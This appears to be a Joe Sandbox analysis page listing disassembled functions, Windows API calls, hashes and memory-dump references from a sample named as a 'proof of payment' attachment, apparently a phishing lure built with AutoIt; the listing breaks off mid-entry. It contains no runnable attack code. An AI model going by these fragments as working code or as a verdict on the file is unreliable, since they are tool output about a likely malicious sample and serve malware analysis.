SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FEB4C0
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FEB4DB

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 15fe3af2035e8d0cfd908a0e8f266173282e1e845dd702b8cb684935154602fd
Instruction ID: 4ef48e639b2d0fcc6b86e32a2803d24d4782e3fcb78c851db8dc3fe19e1fadd9
Opcode Fuzzy Hash: 15fe3af2035e8d0cfd908a0e8f266173282e1e845dd702b8cb684935154602fd
Instruction Fuzzy Hash: AA111C7A900218FFDB11DF99CD85E9EBBB4FB08710F204091E604B7295D771AE11EB94

Function 00FCB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00FCB5A5
GetClientRect.USER32(?,?), ref: 0102E69A
GetCursorPos.USER32(?), ref: 0102E6A4
ScreenToClient.USER32(?,?), ref: 0102E6AF

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 080d6351553bebcac06f09d10650f34252d854b5b78ecc0aefc60148d60ce2cb
Instruction ID: d4075bf31d4f7fa0180388d045ceecf87f66bbbfba7db6feb58fd3623fb86a9a
Opcode Fuzzy Hash: 080d6351553bebcac06f09d10650f34252d854b5b78ecc0aefc60148d60ce2cb
Instruction Fuzzy Hash: D0114F3590002ABFCB20DF98D946DEE77B9EF09305F400455F591E7144D338AA46DBA1

Function 00FF732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00FF7352
MessageBoxW.USER32(?,?,?,?), ref: 00FF7385
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FF739B
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FF73A2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b58818e128df4086bc6534d164d16dda040aaec6fefc334e8a7124ae0161ed7f
Instruction ID: eb1491ec82eedb981ecd24b46a4f706cc7a9bb17f1b96d53db97b9758af6003d
Opcode Fuzzy Hash: b58818e128df4086bc6534d164d16dda040aaec6fefc334e8a7124ae0161ed7f
Instruction Fuzzy Hash: C1110472E04209BFD711ABACDC05AAEBBBDAF48320F144355F961E3295D6758D01A7A0

Function 00FCD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FCD1BA
GetStockObject.GDI32(00000011), ref: 00FCD1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 00FCD1D8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 636e789d32747973d50b360f5c6a046dca952618120c3da03d7e3ebf5f2aba49
Instruction ID: 9957d44217f786e76618c95ed6e7ba52604f6efbc6efa1cc3071c4ef5a0a8968
Opcode Fuzzy Hash: 636e789d32747973d50b360f5c6a046dca952618120c3da03d7e3ebf5f2aba49
Instruction Fuzzy Hash: 21118B7250154ABFEB124FA09D56EEABB6DFF09368F080129FA5452140D736DC60ABA0

Function 00FE4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00FE4E16

Part of subcall function 00FE54F5: __fltout2.LIBCMT ref: 00FE551E

__cftog_l.LIBCMT ref: 00FE4E3C
__cftoe_l.LIBCMT ref: 00FE4E6E

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 0d228ab9539cbb95e2d51e1d5d5314d592a7abf1227d08017ca12d93ee823a3c
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 7D01403640018EBBCF125F85DC158EE3F23BB18764B588459FE2859031D336DAB1BB85

Function 00FD7452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00FD7A0D: __getptd_noexit.LIBCMT ref: 00FD7A0E

__lock.LIBCMT ref: 00FD748F
InterlockedDecrement.KERNEL32(?), ref: 00FD74AC
_free.LIBCMT ref: 00FD74BF
InterlockedIncrement.KERNEL32(009F6E70), ref: 00FD74D7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: e0d412d3c4b44714c00faa0728c4a1bb453880a48aaa208711279618721574ad
Instruction ID: c48e9592300a68764a2840ed4ab05cad8ff5fbe6e4ac77ef0066fae40f2628b3
Opcode Fuzzy Hash: e0d412d3c4b44714c00faa0728c4a1bb453880a48aaa208711279618721574ad
Instruction Fuzzy Hash: AF018231E09721D7C722FF64940675DBB627B05720F184107F4546B784E7686900EBC1

Function 00FD7A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00FD7AD8

Part of subcall function 00FD7CF4: __mtinitlocknum.LIBCMT ref: 00FD7D06
Part of subcall function 00FD7CF4: EnterCriticalSection.KERNEL32(00000000,?,00FD7ADD,0000000D), ref: 00FD7D1F

InterlockedIncrement.KERNEL32(?), ref: 00FD7AE5
__lock.LIBCMT ref: 00FD7AF9
___addlocaleref.LIBCMT ref: 00FD7B17

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID:
API String ID: 1687444384-0
Opcode ID: dac69ef7875dc12cdb67e18f36e7dd87b9fa871783d61c0586f6473c696e1468
Instruction ID: 0f97820a2410c79807dba2048bbacb67ba53993adef338b75f901fe26a5c0da4
Opcode Fuzzy Hash: dac69ef7875dc12cdb67e18f36e7dd87b9fa871783d61c0586f6473c696e1468
Instruction Fuzzy Hash: 85015B71505B00DED720AF75D90674AB7F5AF90325F24890FE4DA9B3A0DB78A680DB00

Function 0101E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101E33D
_memset.LIBCMT ref: 0101E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01073D00,01073D44), ref: 0101E37B
CloseHandle.KERNEL32 ref: 0101E38D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: a83cd32f0d130cb2653ca65a172f383eaae94feb97bb016fc802226b6ade7fe3
Instruction ID: 75949489da34aca85339aa6e789970b3e388b26c558591b3661cb83814a81627
Opcode Fuzzy Hash: a83cd32f0d130cb2653ca65a172f383eaae94feb97bb016fc802226b6ade7fe3
Instruction Fuzzy Hash: A0F05EF1940314BAF2212A64FC49F7B7E6DFB05754F004422BE88EA186D77A9C00A7A9

Function 0101EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00FCAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00FCAFE3
Part of subcall function 00FCAF83: SelectObject.GDI32(?,00000000), ref: 00FCAFF2
Part of subcall function 00FCAF83: BeginPath.GDI32(?), ref: 00FCB009
Part of subcall function 00FCAF83: SelectObject.GDI32(?,00000000), ref: 00FCB033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0101EA8E
LineTo.GDI32(00000000,?,?), ref: 0101EA9B
EndPath.GDI32(00000000), ref: 0101EAAB
StrokePath.GDI32(00000000), ref: 0101EAB9

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 4a252288fd0e73e148add002f840fb88e1b90c356d46f9bdc4812df52905409f
Instruction ID: 046289a497fb1340589474ba50d746ed4a3055551e5614fd7eec9f346741eab7
Opcode Fuzzy Hash: 4a252288fd0e73e148add002f840fb88e1b90c356d46f9bdc4812df52905409f
Instruction Fuzzy Hash: 3BF0BE32005259BBEB229FA4AC0AFCE3F69AF0A710F444101FE81610D583BE6115DB95

Function 00FEC82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FEC84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEC85D
GetCurrentThreadId.KERNEL32 ref: 00FEC864
AttachThreadInput.USER32(00000000), ref: 00FEC86B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 6f6dc03f462d164f71c7d1e4b2d0ed4158bc37184e649714fab934e38ce8db37
Instruction ID: 446ca6d38db82bae8941d0d4e76689d33ad324876dd4557cbd9b2e825ed377ea
Opcode Fuzzy Hash: 6f6dc03f462d164f71c7d1e4b2d0ed4158bc37184e649714fab934e38ce8db37
Instruction Fuzzy Hash: D0E0657154126877DB201AA3DC0DFDB7F1CEF067A1F408011B54D84440C676C581E7E0

Function 00FEB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00FEB0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,00FEAC9D), ref: 00FEB0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FEAC9D), ref: 00FEB0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,00FEAC9D), ref: 00FEB0F1

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 25509e4811002c92f8c49e9f948e0986ff31a48964d6a4f2cf27c3d5bffd2cf1
Instruction ID: 8ef6992691b821197e1d5194109c868bf3902fe257e1180c99a72373b8bc9999
Opcode Fuzzy Hash: 25509e4811002c92f8c49e9f948e0986ff31a48964d6a4f2cf27c3d5bffd2cf1
Instruction Fuzzy Hash: 50E04F32A01211ABD7301FF25D0CB477BACAF55BA2F018828B381D6044DA2994018B60

Function 00FCB47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00FCB496
SetTextColor.GDI32(?,000000FF), ref: 00FCB4A0
SetBkMode.GDI32(?,00000001), ref: 00FCB4B5
GetStockObject.GDI32(00000005), ref: 00FCB4BD
GetWindowDC.USER32(?,00000000), ref: 0102DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0102DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0102DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0102DE6A
GetPixel.GDI32(00000000,?,?), ref: 0102DE8A
ReleaseDC.USER32(?,00000000), ref: 0102DE95

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c45eaaa6a825188d4c7a9685b69846c0a247f70531ddc09a5604f9fa35f16c0c
Instruction ID: ee555ccbd23241e1df1208ddf108a6b67590f0cfbd51f8aa5b745a2d0933989d
Opcode Fuzzy Hash: c45eaaa6a825188d4c7a9685b69846c0a247f70531ddc09a5604f9fa35f16c0c
Instruction Fuzzy Hash: 58E06D31500240BBEF316FA8A80ABD83F25AB11335F00C666F7E9580D6C7764580DB11

Function 00FEB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FEB2DF
UnloadUserProfile.USERENV(?,?), ref: 00FEB2EB
CloseHandle.KERNEL32(?), ref: 00FEB2F4
CloseHandle.KERNEL32(?), ref: 00FEB2FC

Part of subcall function 00FEAB24: GetProcessHeap.KERNEL32(00000000,?,00FEA848), ref: 00FEAB2B
Part of subcall function 00FEAB24: HeapFree.KERNEL32(00000000), ref: 00FEAB32

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 0eb375eb3defeefed8b9b670f0c77b7c05228fe294afd350d6d01a561b779dd7
Instruction ID: 74bbb471bc0a98adddae8a8015b412a9699692ecd40691d2f418b5cd8197a5d6
Opcode Fuzzy Hash: 0eb375eb3defeefed8b9b670f0c77b7c05228fe294afd350d6d01a561b779dd7
Instruction Fuzzy Hash: 4CE0BF3A104005BBCB112BD6DC08859FB7AFF983213508221F65581569CB37A871EB90

Function 0102B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0102B29A
GetDC.USER32(00000000), ref: 0102B2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0102B2C3
ReleaseDC.USER32 ref: 0102B2E2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 26c57b83dc890d77215518f359b156081c0984a561cfa449397887c1a1c0653a
Instruction ID: 394650b927b968705ba5cd27ce406f4f31262c593604026c9b326fcb67759162
Opcode Fuzzy Hash: 26c57b83dc890d77215518f359b156081c0984a561cfa449397887c1a1c0653a
Instruction Fuzzy Hash: 6FE04FB1100204EFDB105FB0C848B2D7BA9EB4C350F51C81AFCAA87200CB7A9840AB40

Function 0102B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0102B2AE
GetDC.USER32(00000000), ref: 0102B2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0102B2C3
ReleaseDC.USER32 ref: 0102B2E2

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 55c468391d788d357beeb09b9ffe8792a3e404a4f948b4be7815b7951a848024
Instruction ID: d17a62cbe344b0fc83d5376e050b7a000abf567692d40bf2800d65e200fc55f3
Opcode Fuzzy Hash: 55c468391d788d357beeb09b9ffe8792a3e404a4f948b4be7815b7951a848024
Instruction Fuzzy Hash: B9E04FB1500200EFDB105FB0C848A2D7BA9EB4C350B518819F9AE87200CB7E9800AB00

Function 00FEDCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00FEDEAA

Strings

AutoIt3GUI, xrefs: 00FEDE22
Container, xrefs: 00FEDE29

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 08af5057ac03e453ce597e8c4576d691b711646c857322abaf1d87537ba1aeda
Instruction ID: 2995b34e607174fce467810239c96a06a117efca9bfda00e0e29b1d63a9a621c
Opcode Fuzzy Hash: 08af5057ac03e453ce597e8c4576d691b711646c857322abaf1d87537ba1aeda
Instruction Fuzzy Hash: 84913770A00641AFDB24DF65C888F6AB7B9BF49710F10856EF84ACF691DB70E841DB60

Function 00FCBCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00FCBCDA
GlobalMemoryStatusEx.KERNEL32 ref: 00FCBCF3

Strings

@, xrefs: 00FCBCE8

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 95bab74325cfa56258eb76eb56e9c1913abc758cc169211e5a85b3d550bece9a
Instruction ID: f8a1d2ee4aa5896b1e95acad20d2a95a90d26cd54c3c8a746ae7ba749bb978b9
Opcode Fuzzy Hash: 95bab74325cfa56258eb76eb56e9c1913abc758cc169211e5a85b3d550bece9a
Instruction Fuzzy Hash: 775154714087469BE360AF14DC86FAFBBECFB98354F41484EF1C8411A6DF7588A89752

Function 00FFC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00FB44ED: __fread_nolock.LIBCMT ref: 00FB450B

_wcscmp.LIBCMT ref: 00FFC65D
_wcscmp.LIBCMT ref: 00FFC670

Strings

FILE, xrefs: 00FFC5A5

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
